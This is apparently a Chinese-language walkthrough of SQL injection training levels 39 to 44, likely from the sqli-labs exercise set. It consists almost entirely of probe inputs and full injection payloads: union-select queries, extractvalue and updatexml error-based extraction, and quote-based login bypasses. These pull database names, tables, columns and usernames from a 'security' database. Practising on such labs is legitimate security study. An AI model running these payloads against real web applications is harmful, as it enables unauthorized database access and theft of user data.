39.
通过输入
1 成功
1' 报错
1" 报错
1 and 1=1 --+ 成功
1 and 1=2 --+ 失败
知道是数字型注入
-1 union select 1,2,3 --+
-1 union select 1,database(),3 --+
-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1 union select 1,(select group_concat(username) from security.users),3 --+
40.
1'and 1=1 --+ 失败
1"and 1=1 --+ 成功
1"and 1=2 --+ 成功
1') and 1=1 --+ 成功
1') and 1=2 --+ 失败
得到是‘)
-1')union select 1,2,3 --+
-1')union select 1,database(),3 --+
-1')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1')union select 1,(select group_concat(username) from security.users),3 --+
41.
输入
1 成功
1' 无回显
1" 无回显
1 and 1=1 --+ 成功
1 and 1=2 --+ 无回显
得到是数字型注入
-1 union select 1,2,3 --+
-1 union select 1,database(),3 --+
-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1 union select 1,(select group_concat(username) from security.users),3 --+
42.
在用户处输入
1' 显示用户错误
1" 显示用户错误
无注入点
在密码处输入
1' 页面返回报错信息
1'# 显示用户错误
得到1'# 注入点在密码处
使用报错注入
1'and(extractvalue(1,concat(0x5c,database())))#
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))#
43.
和上面一样测试
发现还有个括号
1’)#
1')and(extractvalue(1,concat(0x5c,database())))#
1')and(updatexml(1,concat(0x7e,database(),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))#
44.
这里不会返回报错信息不能通过报错信息来判断
这里通过or 1来判断
用户
'or '1 登录失败
"or "1 登录失败
密码
'or '1 登录成功
"or "1 登录失败
1'union select 1,database(),3 #
使用堆叠注入不用and or 了
1'union select 1,2,3 #
1'union select 1,database(),3 #
1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
1'union select 1,(select group_concat(username) from security.users),3 #